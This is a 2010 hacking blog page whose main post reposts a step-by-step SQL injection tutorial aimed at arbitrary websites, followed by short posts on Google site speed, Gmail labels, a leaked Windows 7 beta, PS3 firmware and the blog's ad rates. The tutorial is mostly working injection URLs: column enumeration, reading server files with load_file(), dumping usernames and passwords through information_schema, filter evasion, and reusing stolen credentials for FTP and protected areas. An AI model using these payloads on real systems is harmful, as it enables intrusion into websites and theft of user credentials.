Tuesday, 13 April 2010
Hi folks..This time I m posting a good sql injection tutorial by End3r, which I found quite interesting to read and a gem to share. This SQL injection tutorial will clear your most of sql injection doubts and will cleanly phase in an attack strategy for you.
SQL Injection is defined by http://www.h-spot.net/threat_glossary.htm as:
"The act of entering malformed or unexpected data (perhaps into a front-end web form or front-end application for example) so that the back-end SQL database running behind the website or application executes SQL commands that the programmer never intended to permit, possibly allowing an intruder to break into or damage the database."
Background Information
- It is considered the most common web vulnerability today
- It's a flaw in the web application--not the db, or the server
- Can be injected into: Cookies, Forms, and URL parameters
Lesson Facts
- This lesson uses MySQL syntax for all examples.
- This lesson does not provide reasons for why sites are vulnerable, simply how to exploit them
- This lesson only provides sql injection examples for url parameters such it is such a large subject on it's own
- This lesson gives small examples of filter evasion techniques
The Lesson
Some commands you will need to know:
'union all select' : combines two or more select statements into one query and returns all rows
'order by' : used to sort rows after a select statement is executed
'load_file()' : loads a local file from the site or server examples would be .htaccess or /etc/passwd
'char()' : used to change decimal ascii to strings, can be used for filter evasion--in sql injections, used in conjunction with load_file
'concat()' : combines more than one column into a single column, enabling more columns to be selected than the number that are showing on the page (You will understand better later)
'—' : a comment
'/*' : another type of comment
Injection SQL Queries into URL Parameters
So you've found a site: '
and want to test if it's vulnerable to SQL Injections. Begin by checking if you can execute some of your own queries, so try:
/index.php?id=5 and 1=0--
If after executing the above statement, nothing has happened and the page has remained the same, you can try:
/index.php?id='
If neither of those work, for the purposes of this tutorial move on to another site. Otherwise, if a blank page showed up you just might be in luck!
Now we want to find how many columns and which ones are showing when the select statement is executed so we use:
/index.php?id=5 order by 20
If you get an error decrement the number 20, if there is no error continue incrementing until you get one and then the number just before your error is the number of columns in the table you're selecting from.
Example:
/index.php?id=5 order by 15 <--returns no error, but /index.php?id=5 order by 16
returns an error, then we know that there are 15 columns in our select statement.
The next statement will null the id=5 so the script only executes our commands and not it's own, and show us which columns we can extract data from:
/index.php?id=null union all select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15--
The comment comments out anything the script would append to the end of the statement so that only our statement is looked at.
So now look at the page and if you see any of the numbers you just typed in, you know those columns are showing, and we can gather information from them. For this example let's pretend columns 5, 7, and 9 are showing.
Now we can begin gathering information!
/index.php?id=null union all select 1,2,3,4,user(),6,database(),8,version(),10,11,12,1 3,14,15--
As you can see we selected values from the showing columns, what if we want to clean this up a bit, and put all of those selected values in one column? This is where concat() comes in:
/index.php?id=null union all select 1,2,3,4,concat(user(),char(58),database(),char(58) ,version()),6,7,8,9,10,11,12,13,14,15--
Now look at your page, user(), database(), and version() are all in one place, and are separated by a colon this demonstrates the use of concat() and char().
The user() will usually give something like username@localhost, but you may get lucky and get username@ipaddresshere, in this instance you can try to brute force the FTP login. The version would help you look up exploits for that version of the database() in use--but only if you're a skiddy!
Before we can check if we have load_file perms, we must get an FPD (Full Path Disclosure) so we know exactly where the files are located that we're trying to open. Below are some methods to get an FPD:
/index.php?id[]=
You could attempt to Google the full path of the site by trying something like "/home/sitename" and hoping that you'll find something in Google
Session Cookie Trick
Thanks to haZed at enigmagroup.org. In the url type:
'java script:void(document.cookie="PHPSESSID=");'
This will give a session_start() error and an FPD.
Now we will attempt to use load_file(), this example will load the .htaccess file, make sure you know the file you're trying to load actually exists or you may miss out on your opportunity to realize what great perms you have:
/index.php?id=null union all select 1,2,3,4,load_file(char(47, 104, 111, 109, 101, 47, 115, 105, 116, 101, 110, 97, 109, 101, 47, 100, 105, 114, 47, 97, 108, 108, 111, 102, 116, 104, 105, 115, 105, 115, 102, 114, 111, 109, 111, 117, 114, 102, 112, 100, 47, 46, 104, 116, 97, 99, 99, 101, 115, 115)),6,7,8,9,10,11,12,13,14,15--
If you see the .htaccess file, congrats! You have load_file() perms. Now try to load include files such as config.inc.php for database usernames and passwords, hoping that the admin is dumb enough to use the same username and password for ftp. Another idea would be to load .htpasswd after finding it's location from .htaccess and then logging in to all the password-protected areas that you want to on the site.
If you don't see the .htaccess file, I will include one more way to extract info by using sql injections.
Using information_schema.tables
So you don't have load_file() perms? No problem, we can check for information_schema.tables.
1) 'table_name' is the name of a table that exists in all information_schema tables on every site:
/index.php?id=null union all select 1,2,3,4,table_name,6,7,8,9,10,11,12,13,14,15 from information_schema.tables--
If the site is showing information_schema.tables, the words 'CHARACTER_SETS' will appear in column 5. What can I do with CHARACTER_SETS you might be wondering. Well, nothing that I'm going to show you, but you can find out other tables that exist on the site. The information_schema.tables contains a list of every table in the database on the site, so you can pull up the table username and maybe password if they exist...Then what do you think the information_schema.columns hold? That's right, a list of all the columns on the site. So rather than using just the above injection you could try any of the following:
-/index.php?id=null union all select 1,2,3,4,distinct table_name,6,7,8,9,10,11,12,13,14,15 from information_schema.tables—
Selects all 'distinct' table names from information_schema.tables, meaning it will print out all tables at one time
-/index.php?id=null union all select 1,2,3,4,concat(table_name,char(58),column_name),6, 7,8,9,10,11,12,13,14,15 from information_schema.columns—
Selects all tables and columns that go with each table seperated by a colon
2) If none of the above queries give you anything except for 'CHARACTER_SETS' you will have to use enumeration to determine the names of the other tables:
/index.php?id=null union all select 1,2,3,4,table_name,6,7,8,9,10,11,12,13,14,15 from information_schema.tables where table_name != "CHARACTER_SETS"--
Then it would show the next table in line so you would modify the above to say:
where table_name != "CHARACTER_SETS" and table_name != "nexttableinline"--
Until no more tables show, then you can do the same for the columns.
3) Now after you've executed one or all of those statements, let's say you found the table 'users' and it has the columns 'username', 'password', 'id', and 'email'. To extract that info from the table, use:
/index.php?id=null union all select 1,2,3,4,concat(username, char(58), password, char(58), id, char(58), email),6,7,8,9,10,11,12,13,14,15 from users--
And you'll get the info you requested, of course you can modify that as you like such as:
-/index.php?id=null union all select 1,2,3,4,username,6,password,8,9,10,11,12,13,14,15 from users where id=1--
-/index.php?id=null union all select 1,2,3,4,concat(password, char(58), id, char(58), email),6,7,8,9,10,11,12,13,14,15 from users where username='Admin'
Replacing Admin with the top user's name such as admin or owner etc..
Final Tips
With any luck, one of these methods has worked for you and you were able to accomplish your goal. However, if none of them worked, you can start guessing common table names and then columns:
/index.php?id=null union all select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15 from users
If the page shows up, you know the table exists and you can start guessing column names:
/index.php?id=null union all select 1,2,3,4,username,6,7,8,9,10,11,12,13,14,15 from users
If you get a username, good job you guessed a correct table and column, otherwise keep guessing.
Filter Evasion Techniques
- You can URL Encode characters, hex encode them, use any encoding you like as long as your browser can interpret it
- Rather then using 'union all select' try 'UniON aLL SeLECt' to see if the filter checks case
- Try using the plus sign to split words up: ' 'uni'+'on'+' '+'all'+' '+'Se'+'lect'
- Combine the methods mentioned above using different cases, the plus operator, and not just text but encoding as well
- Be creative
Conclusion
As End3r summarises it -
“Thank you for reading my article, please comment if you found it interesting, found it helpful, or even hated it.
I'd like to thank Rebirth, killerguppy101, & Cr1t1cal for helping me get interested in and learn more about SQL Injections.
Thanks for reading,”
Like This post ? You can buy me a coffee :)
Posted by XERO. ALL RIGHTS RESERVED.
Tuesday, 13 April 2010 by Lucky · 0
Sunday, 11 April 2010
Google has announced that it will be adding the site speed or loading time of a website as a criteria for its search rankings. this was indicated in Google’s last post in December and now its been formally announced by Amit Singhal, and Matt Cutts – Google's principal search quality team. Site speed as a new parameter reflects “how quickly a site responds to web requests" . This change is has been adopted to make this world a happier place
"Speeding up websites is important — not just to site owners, but to all Internet users. Faster sites create happy users and we've seen in our internal studies that when a site responds slowly, visitors spend less time there,"
Faster websites reduce operating costs, improve user experience and overall make internet a more habitable place. But as there are always two faces of a coin,some webmasters are just not finding site speed a solid idea. What about websites that have advertisements ? they will obviously load slower than websites with no advertisements and with plain html. What about websites with flash content ? Worse even,the Google Adsense and Google Adwords code is known to slow a website. Would that ultimately affect a website’s rankings ?
Google has provided a list of free tools to measure speed of a website. Tools like Google Pagespeed,Yahoo’s Yslow are provided to measure website’s speed. Google might use Google toolbar to measure website speed, but is it a reliable measure ? Further, the Google duo commented
“While site speed is a new signal, it doesn't carry as much weight as the relevance of a page. Currently, fewer than 1% of search queries are affected by the site speed signal in our implementation and the signal for site speed only applies for visitors searching in English on Google.com at this point. We launched this change a few weeks back after rigorous testing. If you haven't seen much change to your site rankings, then this site speed change possibly did not impact your site.”
Ah well…if this is true, then the current web design as we know it;is dead. Whatever the bets, a new competition of speed is being heralded in coming days.
In the mean time, you can check out the pagespeed addon from here
Like This post ? You can buy me a coffee :)
Posted by XERO. ALL RIGHTS RESERVED.
Sunday, 11 April 2010 by Lucky · 0
Friday, 9 April 2010
Gmail is now even more customizable as folks at Google provided the facility to arrange labels hierarchically. Now emails can be arranged even more intuitively by making a label child of another label. This highly requested label setting can be enabled by going to
settings-> labs –> Nested labels –> enable it –> save
Once you enable it, you can then name your labels with slashes (/) to make it a child of another label.
For example, if you want to create a simple label hierarchy with a "Social networking" label, and inside it a "Digg" and a "Facebook" label,then you just need to create three labels with the following names:
Social networking
Social networking/Digg
Social networking/Facebook
You can then create “Social networking/twitter” etc to get something like the screenshot on the right. Also, if the parent label doesn't exists then you have to create it before hand.Here you can see above that I have even started to use it and have arranged my labels accordingly.
Another feature to preview emails have been added to Gmail. You can now preview messages by right clicking the mail. this feature is known as Message Sneak-Peek.
You can enable this feature by going to -
settings-> labs –> Message Sneak Peek –> enable it –> save
Experiment and get the max out of your gmail :)
Like This post ? You can buy me a coffee :)
Posted by XERO. ALL RIGHTS RESERVED.
Friday, 9 April 2010 by Lucky · 0
Thursday, 8 April 2010
It has been confirmed that a beta copy of Microsoft's upcoming Windows 7 Service Pack 1 has been leaked on some Torrent sites. Folks at Redmond have yet to confirm a release date for Windows 7 SP1,despite that , a pre-release copy of the minor updates package appears to be unofficially available for download online.
As The Register asked Microsoft that if it could comment on the apparent leak of the Windows 7 SP1 beta (build 6.1.7601.16537.amd64fre.win7.100327-0053), but Microsoft has still been unavailable to comment.This march,Microsoft’s Brandon LeBlanc commented in a blog post that Windows 7 will be receiving a service pack containing minor security updates and feature tweaks. However, no release date was stated with the post.
last month as Microsoft revealed a more details about Windows 7 Service Pack 1, confirming it would involve a small-fry update to the operating system. As expected there aren't any significant changes in SP1, the biggest is the added RemoteFX functionality when paired with Windows Server. The but the install process is much faster than it was for service packs on Windows Vista. Microsoft as a company sticks to a pretty tight frame when it comes to operating updates and patches,based on this,we can fairly assume that Windows 7 SP1 will not be released until late 2010 at the very earliest.
PS: Dont download the beta from torrent sites, it might be rigged with trojans or custom code by potential virus writes. Wait for the original release.
Like This post ? You can buy me a coffee :)
Posted by XERO. ALL RIGHTS RESERVED.
Thursday, 8 April 2010 by Lucky · 0

Why Advertise at PROHACK ?
PR4 Blog250+ Google Followers300+ SMS subscribers300+ Twitter followers500+ Email subscribers1000+ Feedburner readers40K plus visitors65K plus pageviews
Prohack will widen your horizons by spreading your word to its wide and loyal reader base.
Prices are Negotiable in nature, however the current ad placements and the standard prices are -
- The top slot for 40$ per month, 15$per week , 180$ per year and 320$ for 2 years
- The slot after each post (both in random and expanded view) 40$ per month,20$ per week,190 $ per year and 330$ for 2 years
- links on sidebar - 20$ per month (Nofollow)
Twitter tweets - 7$ per tweet
Articles text links - Text link " Dofollow "Ads will be included in the starting,mid or bottom of a relevant article,as the article will not be deleted except in exceptional circumstances,those links will be yours forever and will improve your Google rankings. Only one ad per article is allowed and costs 15$ per article with few words to define your self.
For eg -
Build your links with the best on the web. Visit XYZ.COMArticle advertising - I will be writing an 800-1000 word article about your website/company/enterprise which will include exclusive advertising.The featured article will be for visible for a period of 2 weeks to 1 month on the website front page providing ample view for readers to feed out on your offerings. The gives your review maximum exposure to PROHACK readers. I will be permitting 1 image for a logo and at max 2 images for your agenda. You have to provide me the main theme and the do's and dont's for your firm/enterprise/company/website.50$ per article is the standard price.
Payments must be done Via PAYPAL in advance
Link and Advertising exchange policy
- NO Affiliation with Porn sites,Fake money Making and Referral and Warez sites.
- NO kind of copied content shall be present on requesting site,if they have any,it must be used with proper permission and a link back to original article.
- The sites must have a comparable or better Pagerank or Alexa rank .Or they must be having extraordinary good material or dedicated authors with some great original content.
- Forum owners must have a forum with atleast 5000 members or a dedicated forum with unique and updated content.
- As for a link exchange,please email me your Sites’s name,link,description,topics authored,current Alexa and Pagerank,estimated number of visitors per day,failing to deliver which I will not permit any kind of link exchange.
- As for Advertisers,I have limited number of slots on my site which are available on monthly basis on negotiable charges per slot.As already stated No Advertising related to porn,referrals and warez sites shall be negotiated.
- Your submission will be duly reviewed and then added,and you will be duly notified about it asap.
by Lucky · 0
Acclaimed hacker prodigy George Hotz aka GeoHotz widely renowned for his iPhone jailbreaks, has demoed "custom firmware” running on PS3. When SONY corp. removed features like hardware based PS2 emulation and many others form the console, GeoHotz,open fired by commenting
“Hacking isn't about getting what you didn't pay for, it's about making sure you do get what you did”
The CFW can be installed without having to open up PS3 just by restoring a custom generated PUP file, but only from 3.15 or previous. he further said that removing the support of other operating systems from PS3 will strive other users to find a way to hack it and research for hacks, turning “100000+ legit users into "hackers." Very true indeed.
You can view the video below
Like This post ? You can buy me a coffee :)
POSTED BY XERO . ALL RIGHTS RESERVED.
by Lucky · 0
Wednesday, 7 April 2010
Hi Folks
Sorry for some trouble caused as I m moving on to new domains. The site will be down for sometime
Sorry for the problems caused..
:|
Update # 1
Site might be down for sometime in the mean time, but everything has been fixed as of now. And lets pray it remains in this perfect condition.
Update # 2
As you can see, i have moved on to new domains last month, I have implemented following changes in my website -
- Changed blog template, ( i need your feedback on this one, please :) )
- Bought 2 domains - www.prohack.in and www.theprohack.com. However the primary domain will be www.theprohack.com , Prohack.In will merely forward to www.theprohack.com .
- Added facebook Fanpage box
- Read more and recent posts have been revamped, the linked within was taking too much loading time.
- New Favicon " P# " . looks cooler than previous one.
- Advertising charges will be revamped as well.
One more big news, PROHACK's blogspot domain is now a PR4 blog now :) Never was possible without you folks..
Thanks..
XERO
PROHACK
Wednesday, 7 April 2010 by Lucky · 0